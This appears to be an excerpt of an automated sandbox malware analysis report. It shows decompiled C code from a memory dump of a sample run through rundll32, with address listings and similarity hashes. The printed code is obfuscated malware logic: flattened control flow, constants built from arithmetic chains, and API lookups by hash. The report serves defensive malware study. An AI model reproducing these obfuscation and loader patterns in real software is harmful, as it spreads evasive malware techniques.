                                                                                                                      							if(_t281 == 0x44a4c11) {
                                                                                                                      								_t285 = E0034EF71(1, 0x10);
                                                                                                                      								_push(_t285);
                                                                                                                      								_push(_v148);
                                                                                                                      								_push( &_v128);
                                                                                                                      								_t253 = 0xb;
                                                                                                                      								E00345A07(_t253, _v212);
                                                                                                                      								_t286 =  &(_t286[5]);
                                                                                                                      								_t281 = 0x5b07f93;
                                                                                                                      								goto L9;
                                                                                                                      							} else {
                                                                                                                      								if(_t281 == 0x5b07f93) {
                                                                                                                      									_t280 = E0035C9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
                                                                                                                      									_t286 =  &(_t286[4]);
                                                                                                                      									__eflags = _t280;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t281 = 0xc9ed25e;
                                                                                                                      										goto L9;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t281 == 0xc9ed25e) {
                                                                                                                      										_t285 = 0x4000;
                                                                                                                      										_push(_t252);
                                                                                                                      										_push(_t252);
                                                                                                                      										_t251 = E00353512(0x4000);
                                                                                                                      										__eflags = _t251;
                                                                                                                      										_t233 = 0xe70005f;
                                                                                                                      										_t252 = _v172;
                                                                                                                      										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t281 == 0xdfcaecd) {
                                                                                                                      											E003468DE(_v188, _v160, _v196, _v204, _t280);
                                                                                                                      										} else {
                                                                                                                      											_t295 = _t281 - _t233;
                                                                                                                      											if(_t281 != _t233) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v208);
                                                                                                                      												_push(_v224);
                                                                                                                      												_push(0x34136c);
                                                                                                                      												_t246 = E0034AB66(_v192, _v184, _t295);
                                                                                                                      												_push(_t280);
                                                                                                                      												_push( &_v128);
                                                                                                                      												_push(_t246);
                                                                                                                      												_push(_t285);
                                                                                                                      												_push(_t251);
                                                                                                                      												 *((intOrPtr*)(E0034C1DC(_v192, 0xbf7d08b0, 0xef)))();
                                                                                                                      												E0034AE03(_v156, _v200, _v216, _t246);
                                                                                                                      												_t286 =  &(_t286[0xa]);
                                                                                                                      												_t281 = 0xdfcaecd;
                                                                                                                      												L9:
                                                                                                                      												_t252 = _v172;
                                                                                                                      												goto L1;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t251;
                                                                                                                      						}
                                                                                                                      						_t281 = 0x44a4c11;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t281 - 0xefc9c40;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}











































                                                                                                                      0x00352a6f
                                                                                                                      0x00352a6f
                                                                                                                      0x00352a81
                                                                                                                      0x00352b7d
                                                                                                                      0x00352b86
                                                                                                                      0x00352b87
                                                                                                                      0x00352b8f
                                                                                                                      0x00352b92
                                                                                                                      0x00352b93
                                                                                                                      0x00352b98
                                                                                                                      0x00352b9b
                                                                                                                      0x00000000
                                                                                                                      0x00352a87
                                                                                                                      0x00352a8d
                                                                                                                      0x00352b5c
                                                                                                                      0x00352b5e
                                                                                                                      0x00352b61
                                                                                                                      0x00352b63
                                                                                                                      0x00352b65
                                                                                                                      0x00000000
                                                                                                                      0x00352b65
                                                                                                                      0x00352a93
                                                                                                                      0x00352a99
                                                                                                                      0x00352b10
                                                                                                                      0x00352b1d
                                                                                                                      0x00352b1e
                                                                                                                      0x00352b26
                                                                                                                      0x00352b2e
                                                                                                                      0x00352b30
                                                                                                                      0x00352b36
                                                                                                                      0x00352b3a
                                                                                                                      0x00000000
                                                                                                                      0x00352a9b
                                                                                                                      0x00352aa1
                                                                                                                      0x00352bc9
                                                                                                                      0x00352aa7
                                                                                                                      0x00352aa7
                                                                                                                      0x00352aa9
                                                                                                                      0x00000000
                                                                                                                      0x00352aaf
                                                                                                                      0x00352aaf
                                                                                                                      0x00352ab3
                                                                                                                      0x00352abf
                                                                                                                      0x00352ac4
                                                                                                                      0x00352ad7
                                                                                                                      0x00352ad8
                                                                                                                      0x00352ad9
                                                                                                                      0x00352ada
                                                                                                                      0x00352adb
                                                                                                                      0x00352ae7
                                                                                                                      0x00352af6
                                                                                                                      0x00352afb
                                                                                                                      0x00352afe
                                                                                                                      0x00352b03
                                                                                                                      0x00352b03
                                                                                                                      0x00000000
                                                                                                                      0x00352b03
                                                                                                                      0x00352aa9
                                                                                                                      0x00352aa1
                                                                                                                      0x00352a99
                                                                                                                      0x00352a8d
                                                                                                                      0x00352bd4
                                                                                                                      0x00352bdd
                                                                                                                      0x00352bdd
                                                                                                                      0x00352ba5
                                                                                                                      0x00352baa
                                                                                                                      0x00352baa
                                                                                                                      0x00352baa
                                                                                                                      0x00000000
                                                                                                                      0x00352bb6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: dc30288d57a8d801b7739fa51317af9a9f67c28cad635ada22e8cedb4920697f
                                                                                                                      • Instruction ID: 4046120bc93aa00def48b90666c00b3c4c49b52c0d4a309b34cc982da045d647
                                                                                                                      • Opcode Fuzzy Hash: dc30288d57a8d801b7739fa51317af9a9f67c28cad635ada22e8cedb4920697f
                                                                                                                      • Instruction Fuzzy Hash: E6B120729083809FD355CE29C48A90BFBF0BBD5758F104A2DF9A696260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035A429(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				intOrPtr _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t488;
                                                                                                                      				signed int _t491;
                                                                                                                      				signed int _t492;
                                                                                                                      				signed int _t493;
                                                                                                                      				signed int _t494;
                                                                                                                      				signed int _t495;
                                                                                                                      				signed int _t496;
                                                                                                                      				signed int _t497;
                                                                                                                      				signed int _t498;
                                                                                                                      				signed int _t499;
                                                                                                                      				signed int _t500;
                                                                                                                      				signed int _t503;
                                                                                                                      				void* _t552;
                                                                                                                      				void* _t553;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int* _t558;
                                                                                                                      
                                                                                                                      				_t558 =  &_v2792;
                                                                                                                      				_v2604 = _v2604 & 0x00000000;
                                                                                                                      				_v2616 = 0xa4b63e;
                                                                                                                      				_v2612 = 0x1047f0;
                                                                                                                      				_v2608 = 0x380de4;
                                                                                                                      				_v2640 = 0x3665dd;
                                                                                                                      				_v2640 = _v2640 >> 1;
                                                                                                                      				_v2640 = _v2640 ^ 0x001b32c7;
                                                                                                                      				_v2748 = 0xd91e11;
                                                                                                                      				_v2748 = _v2748 + 0xffffc541;
                                                                                                                      				_v2748 = _v2748 ^ 0x51c605c4;
                                                                                                                      				_v2748 = _v2748 ^ 0x6a8dd901;
                                                                                                                      				_v2748 = _v2748 ^ 0x3b9e7a9b;
                                                                                                                      				_v2788 = 0x157b94;
                                                                                                                      				_v2788 = _v2788 + 0xffffeadc;
                                                                                                                      				_v2788 = _v2788 >> 0x10;
                                                                                                                      				_v2788 = _v2788 + 0xffff73d6;
                                                                                                                      				_v2788 = _v2788 ^ 0xffff2eba;
                                                                                                                      				_v2716 = 0x64154b;
                                                                                                                      				_v2716 = _v2716 * 0x75;
                                                                                                                      				_t552 = __ecx;
                                                                                                                      				_v2716 = _v2716 << 3;
                                                                                                                      				_t553 = 0x422d362;
                                                                                                                      				_v2716 = _v2716 ^ 0x6de46b99;
                                                                                                                      				_v2720 = 0x9c58cd;
                                                                                                                      				_v2720 = _v2720 + 0xffff09d2;
                                                                                                                      				_v2720 = _v2720 + 0x2545;
                                                                                                                      				_v2720 = _v2720 ^ 0x00913431;
                                                                                                                      				_v2688 = 0xaeb597;
                                                                                                                      				_v2688 = _v2688 ^ 0x90c85188;
                                                                                                                      				_t556 = 0x69;
                                                                                                                      				_v2688 = _v2688 / _t556;
                                                                                                                      				_v2688 = _v2688 ^ 0x016f083f;
                                                                                                                      				_v2624 = 0xf336a7;
                                                                                                                      				_v2624 = _v2624 ^ 0x0756d720;
                                                                                                                      				_v2624 = _v2624 ^ 0x07af532c;
                                                                                                                      				_v2780 = 0x2eb910;
                                                                                                                      				_v2780 = _v2780 + 0xffff6a34;
                                                                                                                      				_v2780 = _v2780 + 0x3a3b;
                                                                                                                      				_v2780 = _v2780 >> 0xc;
                                                                                                                      				_v2780 = _v2780 ^ 0x00093eda;
                                                                                                                      				_v2696 = 0x95c01d;
                                                                                                                      				_v2696 = _v2696 ^ 0xd4af9b47;
                                                                                                                      				_t488 = 0x43;
                                                                                                                      				_v2696 = _v2696 * 0x38;
                                                                                                                      				_v2696 = _v2696 ^ 0x6cc3512a;
                                                                                                                      				_v2756 = 0x7bda8f;
                                                                                                                      				_v2756 = _v2756 >> 4;
                                                                                                                      				_v2756 = _v2756 + 0xffff790e;
                                                                                                                      				_v2756 = _v2756 << 1;
                                                                                                                      				_v2756 = _v2756 ^ 0x00077f92;
                                                                                                                      				_v2672 = 0xbe500a;
                                                                                                                      				_v2672 = _v2672 * 0x69;
                                                                                                                      				_v2672 = _v2672 ^ 0x4e081773;
                                                                                                                      				_v2664 = 0xf21545;
                                                                                                                      				_v2664 = _v2664 << 1;
                                                                                                                      				_v2664 = _v2664 ^ 0x01e0a5ee;
                                                                                                                      				_v2712 = 0x4aa3d0;
                                                                                                                      				_v2712 = _v2712 / _t488;
                                                                                                                      				_v2712 = _v2712 + 0xffffba00;
                                                                                                                      				_v2712 = _v2712 ^ 0x00096837;
                                                                                                                      				_v2704 = 0x6e8851;
                                                                                                                      				_v2704 = _v2704 * 0x4c;
                                                                                                                      				_v2704 = _v2704 ^ 0x74892048;
                                                                                                                      				_v2704 = _v2704 ^ 0x54501412;
                                                                                                                      				_v2740 = 0x9704ff;
                                                                                                                      				_t491 = 0x4c;
                                                                                                                      				_v2740 = _v2740 / _t491;
                                                                                                                      				_v2740 = _v2740 + 0xffff50cb;
                                                                                                                      				_v2740 = _v2740 / _t556;
                                                                                                                      				_v2740 = _v2740 ^ 0x0004486b;
                                                                                                                      				_v2772 = 0xa165e2;
                                                                                                                      				_t492 = 0x36;
                                                                                                                      				_v2772 = _v2772 / _t492;
                                                                                                                      				_v2772 = _v2772 ^ 0x6089554b;
                                                                                                                      				_t493 = 0x29;
                                                                                                                      				_v2772 = _v2772 * 0x30;
                                                                                                                      				_v2772 = _v2772 ^ 0x1a2b5067;
                                                                                                                      				_v2680 = 0xe9519d;
                                                                                                                      				_v2680 = _v2680 / _t493;
                                                                                                                      				_v2680 = _v2680 | 0xd8f73a5a;
                                                                                                                      				_v2680 = _v2680 ^ 0xd8f0b3ca;
                                                                                                                      				_v2656 = 0x3fe983;
                                                                                                                      				_t494 = 0x30;
                                                                                                                      				_v2656 = _v2656 / _t494;
                                                                                                                      				_v2656 = _v2656 ^ 0x00046ac2;
                                                                                                                      				_v2628 = 0x33b4cd;
                                                                                                                      				_t495 = 0x11;
                                                                                                                      				_v2628 = _v2628 / _t495;
                                                                                                                      				_v2628 = _v2628 ^ 0x00043067;
                                                                                                                      				_v2648 = 0x47920b;
                                                                                                                      				_t496 = 0x1a;
                                                                                                                      				_v2648 = _v2648 * 7;
                                                                                                                      				_v2648 = _v2648 ^ 0x01f55662;
                                                                                                                      				_v2636 = 0xc27dad;
                                                                                                                      				_v2636 = _v2636 | 0xeea2905e;
                                                                                                                      				_v2636 = _v2636 ^ 0xeee70f52;
                                                                                                                      				_v2792 = 0xce83a7;
                                                                                                                      				_v2792 = _v2792 | 0x91097b86;
                                                                                                                      				_v2792 = _v2792 >> 0x10;
                                                                                                                      				_v2792 = _v2792 + 0xfffff873;
                                                                                                                      				_v2792 = _v2792 ^ 0x000d88b9;
                                                                                                                      				_v2764 = 0x687458;
                                                                                                                      				_v2764 = _v2764 + 0xffff3130;
                                                                                                                      				_v2764 = _v2764 / _t488;
                                                                                                                      				_v2764 = _v2764 | 0xf90624cd;
                                                                                                                      				_v2764 = _v2764 ^ 0xf90653f7;
                                                                                                                      				_v2784 = 0xf92951;
                                                                                                                      				_v2784 = _v2784 + 0xffff51be;
                                                                                                                      				_v2784 = _v2784 ^ 0x8ae9764d;
                                                                                                                      				_v2784 = _v2784 + 0x99a0;
                                                                                                                      				_v2784 = _v2784 ^ 0x8a16d001;
                                                                                                                      				_v2732 = 0xd5993f;
                                                                                                                      				_v2732 = _v2732 / _t496;
                                                                                                                      				_v2732 = _v2732 + 0xffff4990;
                                                                                                                      				_v2732 = _v2732 ^ 0x000978e2;
                                                                                                                      				_v2724 = 0xcf1521;
                                                                                                                      				_v2724 = _v2724 >> 2;
                                                                                                                      				_v2724 = _v2724 << 0xa;
                                                                                                                      				_v2724 = _v2724 ^ 0xcf1adb57;
                                                                                                                      				_v2728 = 0xc9d07f;
                                                                                                                      				_v2728 = _v2728 + 0xffff241f;
                                                                                                                      				_v2728 = _v2728 + 0xffff5e1a;
                                                                                                                      				_v2728 = _v2728 ^ 0x00c03f16;
                                                                                                                      				_v2632 = 0x51b7a0;
                                                                                                                      				_t497 = 0xd;
                                                                                                                      				_v2632 = _v2632 / _t497;
                                                                                                                      				_v2632 = _v2632 ^ 0x0003c006;
                                                                                                                      				_v2768 = 0xdee1c4;
                                                                                                                      				_t498 = 0x72;
                                                                                                                      				_v2768 = _v2768 * 0x4b;
                                                                                                                      				_v2768 = _v2768 ^ 0x45bd8e4b;
                                                                                                                      				_v2768 = _v2768 + 0x810;
                                                                                                                      				_v2768 = _v2768 ^ 0x04f5c4f4;
                                                                                                                      				_v2620 = 0x673f5;
                                                                                                                      				_v2620 = _v2620 / _t498;
                                                                                                                      				_v2620 = _v2620 ^ 0x0006a8dc;
                                                                                                                      				_v2776 = 0xc1ae10;
                                                                                                                      				_t499 = 0x5a;
                                                                                                                      				_v2776 = _v2776 * 0x5d;
                                                                                                                      				_v2776 = _v2776 / _t499;
                                                                                                                      				_t500 = 0x7a;
                                                                                                                      				_v2776 = _v2776 / _t500;
                                                                                                                      				_v2776 = _v2776 ^ 0x0000f358;
                                                                                                                      				_v2668 = 0x9bfbd0;
                                                                                                                      				_v2668 = _v2668 * 0x2e;
                                                                                                                      				_v2668 = _v2668 ^ 0x1c042184;
                                                                                                                      				_v2700 = 0xcd0c2b;
                                                                                                                      				_v2700 = _v2700 >> 8;
                                                                                                                      				_v2700 = _v2700 + 0xfffff064;
                                                                                                                      				_v2700 = _v2700 ^ 0x0007642a;
                                                                                                                      				_v2708 = 0x1a6cb4;
                                                                                                                      				_v2708 = _v2708 ^ 0x57f593cf;
                                                                                                                      				_v2708 = _v2708 | 0x44881231;
                                                                                                                      				_v2708 = _v2708 ^ 0x57eba098;
                                                                                                                      				_v2752 = 0xd7110a;
                                                                                                                      				_v2752 = _v2752 / _t556;
                                                                                                                      				_v2752 = _v2752 << 0xe;
                                                                                                                      				_v2752 = _v2752 + 0xffff1365;
                                                                                                                      				_v2752 = _v2752 ^ 0x83185000;
                                                                                                                      				_v2760 = 0xc45920;
                                                                                                                      				_v2760 = _v2760 + 0xffffdf34;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xfa48;
                                                                                                                      				_v2760 = _v2760 ^ 0x00031526;
                                                                                                                      				_v2652 = 0x3af3c9;
                                                                                                                      				_v2652 = _v2652 << 0xf;
                                                                                                                      				_v2652 = _v2652 ^ 0x79efd05d;
                                                                                                                      				_v2660 = 0x38b4f1;
                                                                                                                      				_v2660 = _v2660 ^ 0x7076ccd1;
                                                                                                                      				_v2660 = _v2660 ^ 0x704b934c;
                                                                                                                      				_v2744 = 0x6269bc;
                                                                                                                      				_v2744 = _v2744 | 0xfa5eccfb;
                                                                                                                      				_v2744 = _v2744 * 0x5f;
                                                                                                                      				_v2744 = _v2744 << 0xe;
                                                                                                                      				_v2744 = _v2744 ^ 0x9469f4ee;
                                                                                                                      				_v2676 = 0x941055;
                                                                                                                      				_v2676 = _v2676 | 0xfd7f72ef;
                                                                                                                      				_v2676 = _v2676 ^ 0xfdfef17e;
                                                                                                                      				_v2684 = 0x7199f;
                                                                                                                      				_v2684 = _v2684 + 0x9aa9;
                                                                                                                      				_v2684 = _v2684 << 0xe;
                                                                                                                      				_v2684 = _v2684 ^ 0xed16f6de;
                                                                                                                      				_v2644 = 0xf4560;
                                                                                                                      				_v2644 = _v2644 * 0x1c;
                                                                                                                      				_v2644 = _v2644 ^ 0x01a06f93;
                                                                                                                      				_v2692 = 0x891e84;
                                                                                                                      				_v2692 = _v2692 ^ 0x46454346;
                                                                                                                      				_v2692 = _v2692 | 0x068a2534;
                                                                                                                      				_v2692 = _v2692 ^ 0x46ca9877;
                                                                                                                      				_v2736 = 0x29dfc8;
                                                                                                                      				_t471 = _v2736 * 0x19;
                                                                                                                      				_v2736 = _t471;
                                                                                                                      				_v2736 = _v2736 | 0x3d4578d3;
                                                                                                                      				_v2736 = _v2736 >> 4;
                                                                                                                      				_v2736 = _v2736 ^ 0x03d45238;
                                                                                                                      				while(_t553 != 0x2953b22) {
                                                                                                                      					if(_t553 == 0x422d362) {
                                                                                                                      						_t553 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t565 = _t553 - 0xe704baa;
                                                                                                                      						if(_t553 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t553 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E003612A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
                                                                                                                      							 *((short*)(E00354FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
                                                                                                                      							E00348650(_v2780,  &_v1560, _t565, _v2696);
                                                                                                                      							_push(_v2712);
                                                                                                                      							_push(_v2664);
                                                                                                                      							_push(0x34181c);
                                                                                                                      							E0034E7CE(E0034AB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
                                                                                                                      							E0034AE03(_v2628, _v2648, _v2636, _t483);
                                                                                                                      							_t500 = _v2792;
                                                                                                                      							_t471 = E0035C38F(_t500,  &_v2080, _t552, _v2764);
                                                                                                                      							_t558 =  &(_t558[0x15]);
                                                                                                                      							if(_t471 != 0) {
                                                                                                                      								_t553 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t471;
                                                                                                                      				}
                                                                                                                      				_push(_t500);
                                                                                                                      				E0034EA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
                                                                                                                      				_push(_v2776);
                                                                                                                      				_push(_v2620);
                                                                                                                      				_push(0x34185c);
                                                                                                                      				E0034E7CE(E0034AB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
                                                                                                                      				_t503 = _v2652;
                                                                                                                      				E0034AE03(_t503, _v2660, _v2744, _t473);
                                                                                                                      				__eflags = 0;
                                                                                                                      				_push(_v2736);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(_v2644);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2684);
                                                                                                                      				_push(_t503);
                                                                                                                      				_push(0);
                                                                                                                      				_t500 =  &_v520;
                                                                                                                      				_t471 = E00349700(_t500, _v2676, 0);
                                                                                                                      				_t558 =  &(_t558[0x1c]);
                                                                                                                      				_t553 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x0035a56f
                                                                                                                      0x0035a574
                                                                                                                      0x0035a57c
                                                                                                                      0x0035a584
                                                                                                                      0x0035a591
                                                                                                                      0x0035a592
                                                                                                                      0x0035a596
                                                                                                                      0x0035a59e
                                                                                                                      0x0035a5a6
                                                                                                                      0x0035a5ab
                                                                                                                      0x0035a5b3
                                                                                                                      0x0035a5b7
                                                                                                                      0x0035a5bf
                                                                                                                      0x0035a5d2
                                                                                                                      0x0035a5d9
                                                                                                                      0x0035a5e4
                                                                                                                      0x0035a5ef
                                                                                                                      0x0035a5f6
                                                                                                                      0x0035a601
                                                                                                                      0x0035a60f
                                                                                                                      0x0035a613
                                                                                                                      0x0035a61b
                                                                                                                      0x0035a623
                                                                                                                      0x0035a630
                                                                                                                      0x0035a634
                                                                                                                      0x0035a63c
                                                                                                                      0x0035a644
                                                                                                                      0x0035a654
                                                                                                                      0x0035a659
                                                                                                                      0x0035a65d
                                                                                                                      0x0035a66d
                                                                                                                      0x0035a671
                                                                                                                      0x0035a679
                                                                                                                      0x0035a687
                                                                                                                      0x0035a68c
                                                                                                                      0x0035a690
                                                                                                                      0x0035a69f
                                                                                                                      0x0035a6a2
                                                                                                                      0x0035a6a6
                                                                                                                      0x0035a6ae
                                                                                                                      0x0035a6c4
                                                                                                                      0x0035a6cb
                                                                                                                      0x0035a6d6
                                                                                                                      0x0035a6e1
                                                                                                                      0x0035a6f3
                                                                                                                      0x0035a6f8
                                                                                                                      0x0035a6ff
                                                                                                                      0x0035a70a
                                                                                                                      0x0035a71e
                                                                                                                      0x0035a723
                                                                                                                      0x0035a72a
                                                                                                                      0x0035a735
                                                                                                                      0x0035a74a
                                                                                                                      0x0035a74b
                                                                                                                      0x0035a752
                                                                                                                      0x0035a75d
                                                                                                                      0x0035a768
                                                                                                                      0x0035a773
                                                                                                                      0x0035a77e
                                                                                                                      0x0035a786
                                                                                                                      0x0035a78e
                                                                                                                      0x0035a793
                                                                                                                      0x0035a79b
                                                                                                                      0x0035a7a3
                                                                                                                      0x0035a7ab
                                                                                                                      0x0035a7bb
                                                                                                                      0x0035a7bf
                                                                                                                      0x0035a7c7
                                                                                                                      0x0035a7cf
                                                                                                                      0x0035a7d7
                                                                                                                      0x0035a7df
                                                                                                                      0x0035a7e7
                                                                                                                      0x0035a7ef
                                                                                                                      0x0035a7f7
                                                                                                                      0x0035a805
                                                                                                                      0x0035a809
                                                                                                                      0x0035a811
                                                                                                                      0x0035a81b
                                                                                                                      0x0035a823
                                                                                                                      0x0035a828
                                                                                                                      0x0035a82d
                                                                                                                      0x0035a835
                                                                                                                      0x0035a83d
                                                                                                                      0x0035a845
                                                                                                                      0x0035a84d
                                                                                                                      0x0035a855
                                                                                                                      0x0035a869
                                                                                                                      0x0035a86e
                                                                                                                      0x0035a875
                                                                                                                      0x0035a880
                                                                                                                      0x0035a88f
                                                                                                                      0x0035a892
                                                                                                                      0x0035a896
                                                                                                                      0x0035a89e
                                                                                                                      0x0035a8a6
                                                                                                                      0x0035a8ae
                                                                                                                      0x0035a8c4
                                                                                                                      0x0035a8cb
                                                                                                                      0x0035a8d6
                                                                                                                      0x0035a8e3
                                                                                                                      0x0035a8e6
                                                                                                                      0x0035a8f2
                                                                                                                      0x0035a8fa
                                                                                                                      0x0035a8ff
                                                                                                                      0x0035a903
                                                                                                                      0x0035a90b
                                                                                                                      0x0035a91e
                                                                                                                      0x0035a925
                                                                                                                      0x0035a930
                                                                                                                      0x0035a938
                                                                                                                      0x0035a93d
                                                                                                                      0x0035a945
                                                                                                                      0x0035a94d
                                                                                                                      0x0035a955
                                                                                                                      0x0035a95d
                                                                                                                      0x0035a965
                                                                                                                      0x0035a96d
                                                                                                                      0x0035a97b
                                                                                                                      0x0035a97f
                                                                                                                      0x0035a984
                                                                                                                      0x0035a98c
                                                                                                                      0x0035a994
                                                                                                                      0x0035a99c
                                                                                                                      0x0035a9a4
                                                                                                                      0x0035a9a9
                                                                                                                      0x0035a9b1
                                                                                                                      0x0035a9b9
                                                                                                                      0x0035a9c4
                                                                                                                      0x0035a9cc
                                                                                                                      0x0035a9d7
                                                                                                                      0x0035a9e2
                                                                                                                      0x0035a9ed
                                                                                                                      0x0035a9f8
                                                                                                                      0x0035aa00
                                                                                                                      0x0035aa0d
                                                                                                                      0x0035aa16
                                                                                                                      0x0035aa20
                                                                                                                      0x0035aa28
                                                                                                                      0x0035aa33
                                                                                                                      0x0035aa3e
                                                                                                                      0x0035aa49
                                                                                                                      0x0035aa51
                                                                                                                      0x0035aa59
                                                                                                                      0x0035aa5e
                                                                                                                      0x0035aa66
                                                                                                                      0x0035aa79
                                                                                                                      0x0035aa80
                                                                                                                      0x0035aa8b
                                                                                                                      0x0035aa93
                                                                                                                      0x0035aa9b
                                                                                                                      0x0035aaa3
                                                                                                                      0x0035aaab
                                                                                                                      0x0035aab3
                                                                                                                      0x0035aab8
                                                                                                                      0x0035aabc
                                                                                                                      0x0035aac4
                                                                                                                      0x0035aac9
                                                                                                                      0x0035aad1
                                                                                                                      0x0035aadf
                                                                                                                      0x0035abe3
                                                                                                                      0x00000000
                                                                                                                      0x0035aae5
                                                                                                                      0x0035aae5
                                                                                                                      0x0035aae7
                                                                                                                      0x0035acbc
                                                                                                                      0x0035acbc
                                                                                                                      0x0035acc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035aaed
                                                                                                                      0x0035ab01
                                                                                                                      0x0035ab34
                                                                                                                      0x0035ab3b
                                                                                                                      0x0035ab40
                                                                                                                      0x0035ab44
                                                                                                                      0x0035ab56
                                                                                                                      0x0035ab9c
                                                                                                                      0x0035abb7
                                                                                                                      0x0035abc0
                                                                                                                      0x0035abcc
                                                                                                                      0x0035abd1
                                                                                                                      0x0035abd6
                                                                                                                      0x0035abdc
                                                                                                                      0x00000000
                                                                                                                      0x0035abdc
                                                                                                                      0x0035abd6
                                                                                                                      0x0035aae7
                                                                                                                      0x0035acd2
                                                                                                                      0x0035acd2
                                                                                                                      0x0035abea
                                                                                                                      0x0035ac0a
                                                                                                                      0x0035ac0f
                                                                                                                      0x0035ac13
                                                                                                                      0x0035ac25
                                                                                                                      0x0035ac65
                                                                                                                      0x0035ac76
                                                                                                                      0x0035ac7d
                                                                                                                      0x0035ac85
                                                                                                                      0x0035ac87
                                                                                                                      0x0035ac8b
                                                                                                                      0x0035ac8f
                                                                                                                      0x0035ac96
                                                                                                                      0x0035ac97
                                                                                                                      0x0035ac98
                                                                                                                      0x0035aca6
                                                                                                                      0x0035aca7
                                                                                                                      0x0035aca8
                                                                                                                      0x0035acaf
                                                                                                                      0x0035acb4
                                                                                                                      0x0035acb7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
